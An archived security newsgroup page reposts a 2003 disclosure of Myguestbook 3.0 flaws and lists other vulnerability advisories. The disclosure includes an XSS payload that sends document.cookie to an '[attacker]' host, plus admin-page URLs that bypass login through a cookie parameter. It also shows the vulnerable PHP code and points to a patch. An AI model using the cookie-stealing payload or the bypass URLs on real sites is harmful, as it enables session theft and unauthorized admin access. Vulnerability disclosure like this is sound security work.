Myguestbook Multiple Vulnerabilities

Posted on 24 February 2003


From: Frog Man <leseulfrog@hotmail.com>

Informations :
��������������
Version : 3.0
Website : http://www.tefonline.net/
Problems :
- XSS -> admin infos recovery
- Access to admin pages
PHP Code/Location :
�������������������
If pseudo = [SCRIPT],
e-mail = >[SCRIPT]
or message = </textarea>[SCRIPT]

[SCRIPT] will be executed on index.php, /admin/user_modif.php, /admin/admin_modif.php and /admin/admin_suppr.php .

/admin/confirm_connect.php :
---------------------------------------------
SetCookie("Myguestbook","$name:$password");
---------------------------------------------

/admin/admin_pass.php, /admin/admin_index.php, /admin/admin_modif.php and /admin/admin_suppr.php :
--------------------------------------------------------------------
<?
if(!isset($Myguestbook))
header("location:../index.php?MSG=permis");
?>
--------------------------------------------------------------------


Exploits :
����������
[SCRIPT] :
<script>
location='http://[attacker]/file.php?'+document.cookie;
</script>

http://[target]/admin/admin_index.php?Myguestbook=1
http://[target]/admin/admin_pass.php?Myguestbook=1
http://[target]/admin/admin_modif.php?Myguestbook=1
http://[target]/admin/admin_suppr.php?Myguestbook=1

http://[target]/admin/user_modif.php?id=[MESSAGEID]

Solution : ���������� A patch can be found on http://www.phpsecure.org. More Details :
��������������
In French :
http://www.frog-man.org/tutos/Myguestbook.txt
Translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FMyguestbook.txt&langpair=fr%7Cen&hl=en&ie=ISO-8859-1
&prev=%2Flanguage_tools

frog-m@n
_________________________________________________________________


--
Regard:
Joh@nnes
1216771 Ont.Inc.
"If you know neither the enemy nor yourself,you will succumb in every battle"
0
Johannes
2/24/2003 7:50:00 PM
grc.security 16608 articles. 3 followers. Follow

0 Replies
12837 Views

Similar Articles

[PageSpeed] 57

Reply:

Similar Artilces:

The Bat! Multiple Security Vulnerabilities
Posted on 28 October 2003 From: Bipin Gautam hUNT3R <door_hunt3r(at)blackcodemail.com> 'The Bat!' [http://www.ritlabs.com/] is a powerful, highly configurable, MULTI-USER, yet easy to use email client. I have discoverd some serious security holes in 'The Bat!' mmm..., when a new account is created in 'The Bat!' It creates the account in %programfiledir%The Bat!MAIL without implimenting any proper ACL! so even a guest USER IS ABLE TO READ! THE "MESSAGES.TBB" "MESSAGES.TBI" of both 'INBOX' AND 'OUTBOX' by just cr...

VP
VP-ASP Multiple Security Vulnerabilities @ SMS May 28 2002 - 08:07 EST From: RattleSnake : VP-ASP combines ease of use and powerful features with unlimited customization. Based on feedback from many successful VP-ASP e-commerce sites, Version 4.0 builds on solid technology but now expands that technology to an e-commerce system without peer. Unfortunately, the product has been found to contain multiple security vulnerabilities. continued... http://www.securiteam.com/securitynews/5AP0Q2075Y.html -- Regard: Joh@nnes 1216771 Ont.Inc. "Today is memory & Tomorrow is ...

Hosting Controller Multiple Security Vulnerabilities
http://www.neworder.box.sk/showme.php3?id=6013 -- Regard: Joh@nnes� 1216771 Ont.Inc. "Nothing is more damaging to a new truth than an old error" > http://www.neworder.box.sk/showme.php3?id=6013 Interesting reading, but somewhat old news, in any case take a look here: http://www.shebeen.com/hack.htm and be sure to install the IIS Lockdown tool ASAP so that You'll be (relatively) safe from most attacks. TX, Obi for your reply & URL....but sometimes is refreshing for Corporation folks ;-) -- Regard: Joh@nnes� 1216771 Ont.Inc. "Nothing is more...

Opera Web Browser Multiple Security Vulnerabilities
Updated: Dec 31 2007 07:50AM http://www.securityfocus.com/bid/26937 Not Vulnerable: Opera Software Opera Web Browser 9.25 -- "Not everything that counts can be counted, and not everything that can be counted counts." ...

Vulnerabilities and Security, is AJAX secure ?
Hi All, Since Microsoft's SmartClient technology did not succeed as expected (because its complex design and coding), I recently realized that I have no option but to try to improve my projects with AJAX. Although it's understandable to feel fear when using a "new" or "non-mature" technology, I found this document that made me think twice before I update some of my work to avoid users suffer the "POST" pain: http://www.owasp.org/index.php/Testing_for_AJAX_Vulnerabilities Can somebody provide me some feedback about this text ?, I found it very...

@Mail Web Interface Multiple Security Vulnerabilities
Posted on 10 December 2003 From: S-Quadra Security Research <research(at)s-quadra.com> S-Quadra Advisory #2003-12-09 Topic: @Mail web interface multiple security vulnerabilities Severity: Average Vendor URL: http://www.atmail.com Advisory URL: http://www.s-quadra.com/advisories/Adv-20031209.txt Release date: 09 Dec 2003 1. DESCRIPTION "@Mail is a feature rich Email solution that allows users to access email-resources via the web or a variety of wireless devices. The software incorporates a complete email-server package to manage and host user email at your do...

OpenOffice Multiple Unspecified Remote Security Vulnerabilities
Bugtraq ID: 36285 Class: Input Validation Error CVE: Remote: Yes Local: No Published: Sep 03 2009 12:00AM Updated: Sep 04 2009 11:02PM Credit: Intevydis Vulnerable: Not Vulnerable: http://www.securityfocus.com/bid/36285 -- "If U know neither the enemy nor yourself,U will succumb in every battle" On Sun, 6 Sep 2009 13:41:00 -0600, "parad0X" <parad0X@lupa.cc> wrote: > Bugtraq ID: 36285 > Class: Input Validation Error > CVE: > ...

BadBlue Contains Multiple Security Vulnerabilities (Exploit code)
http://www.neworder.box.sk/showme.php3?id=6102 -- Regard: Joh@nnes� 1216771 Ont.Inc. "Nothing is more damaging to a new truth than an old error" ...

F-Secure Multiple Products ARJ Archive Handling Vulnerability
F-Secure Multiple Products ARJ Archive Handling Vulnerability http://secunia.com/advisories/14216/ ----------------------------------------------------------- Quote ----------------------------------------------------------- Secunia Advisory: SA14216 Print Advisory Release Date: 2005-02-10 Critical: Highly critical Impact: System access Where: From remote Solution Status: Vendor Patch Software: F-Secure Anti-Virus 2004 F-Secure Anti-Virus 2005 F-Secure Anti-Virus 5.x F-Secure Anti-Virus Client Security 5.x F-Secure Anti-Virus for Firewalls...

Cisco Security Advisory: Multiple Vulnerabilities in Cisco Unified MeetingPlace
Just wanted to call attention these patches released today: http://www.cisco.com/en/US/products/products_security_advisory09186a0080b1490b.shtml This affects Cisco Unified MeetingPlace versions 5, 6, and 7. If you use this software, please start patching. http://www.dshield.org/diary.html?storyid=8101 -- "If U know neither the enemy nor yourself,U will succumb in every battle" ...

Sun Java Micro Edition (ME) Multiple Unspecified Security-Bypass Vulnerabilities
Bugtraq ID: 30591 Class: Access Validation Error CVE: Remote: Yes Local: No Published: Aug 07 2008 12:00AM Updated: Aug 07 2008 06:17PM Credit: Security Explorations Vulnerable: Sun Java Wireless Toolkit 2.5.2 Sun Java 2 Micro Edition Nokia Series 40 0 Not Vulnerable: http://www.securityfocus.com/bid/30591 -- "Never drive faster than your ANGEL can fly" ...

US-CERT Cyber Security Alert SA04-261A -- Multiple vulnerabilities in Mozilla products
-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Cyber Security Alert SA04-261A Multiple vulnerabilities in Mozilla products Original release date: September 17, 2004 Last revised: -- Source: US-CERT Systems Affected * Mozilla Suite (Mozilla web browser, Mozilla Mail) * Firefox web browser * Thunderbird email client Overview By taking advantage of one or more vulnerabilities in Mozilla products, an attacker may be able to take control of your computer. Solution Upgrade to the latest version ...

Apple Mac OS X v10.5.1 2007-009 Multiple Security Vulnerabilities
Bugtraq ID: 26910 Class: Unknown CVE: CVE-2007-4708 CVE-2007-4709 CVE-2007-4710 CVE-2007-5847 CVE-2007-5848 CVE-2007-5849 CVE-2007-5850 CVE-2007-5851 CVE-2007-5853 CVE-2007-5854 CVE-2007-5855 CVE-2007-5856 CVE-2007-5857 CVE-2007-5859 CVE-2007-5876 CVE-2007-5860 CVE-2007-5861 Remote: Yes Local: Yes Published: Dec 17 2007 12:00AM Updated: Jan 05 2008 05:09PM Credit: Sean Harding, Tom Ferris, Dave Camp, Wei Wang, Michal ...

iDefense Security Advisory 03.23.05: ISS Multiple Products Local Privilege Escalation Vulnerability
ISS Multiple Products Local Privilege Escalation Vulnerability iDefense Security Advisory 03.23.05 http://www.idefense.com/intelligence/vulnerabilities/display.php?id=403 March 23, 2006 I. BACKGROUND Internet Security Systems (ISS) has developed a suite of tools aimed at securing server and desktop systems. A flaw exists within a central module to these components that can allow unprivileged users to obtain complete control of the machine. http://www.iss.net/products_services/products.php II. DESCRIPTION Local exploitation of a design error in the multiple Internet Secur...

Web resources about - Myguestbook Multiple Vulnerabilities - grc.security

Common Vulnerabilities and Exposures - Wikipedia, the free encyclopedia
... (also called "CVE names", "CVE numbers", "CVE-IDs", and "CVEs") as unique, common identifiers for publicly known information security vulnerabilities. ...

Viber Security Vulnerabilities: Images, Doodles, Location and Videos sent over Viber is unencrypted ...
http://www.unhcfreg.com http://cyberforensics.newhaven.edu Interested in studying with us? http://www.newhaven.edu/engineering/get-informati ...

Security appliances are riddled with serious vulnerabilities, researcher says - firewalls, Citrix, antispam ...
... and Web gateways, firewalls, remote access servers, UTM (united threat management) systems and other security appliances have serious vulnerabilities, ...

Researcher unearths two new Java zero-day bugs - Cybercrime and Hacking, security, Malware and Vulnerabilities ...
A Polish security firm known for rooting out Java vulnerabilities has reported two new bugs in the browser plug-in to Oracle, Security Explorations ...

Sophos fixes vulnerabilities in its Web security appliance - patches, firewalls, Networking, security ...
... vendor Sophos has released an update for the software used on its Web gateway security appliance in order to address three serious vulnerabilities ...

Apple iOS v6.1 (iPhone5) - 2 x Mobile Pass Code (Auth) Bypass Vulnerabilities #2013 - YouTube
iOS v6.1 - Mobile Code Lock Bypass Vulnerabilities (x2) 1# Emergency call function via power off (standby) (already release by another researcher) ...

New vulnerabilities found in software behind Heartbleed bug
Security researchers have uncovered new bugs in the Web encryption software that caused the pernicious "Heartbleed" Internet threat that surfaced ...

Shakeup after report highlights U.S. airport security vulnerabilities - CTV News
U.S. Homeland Security Secretary Jeh Johnson has reassigned the leader of the Transportation Security Administration and directed the agency ...

Apple blocks all outdated versions of Adobe Flash in Safari due to vulnerabilities
... Apps , update , and OS X at 9to5Mac . What do you think? Discuss "Apple blocks all outdated versions of Adobe Flash in Safari due to vulnerabilities" ...

HackerOne: A Superior Solution for Solving Web Vulnerabilities
... this growing problem. Some companies have attacked this problem by offering financial rewards to researchers that help them identify vulnerabilities. ...

Resources last updated: 12/23/2015 3:23:13 AM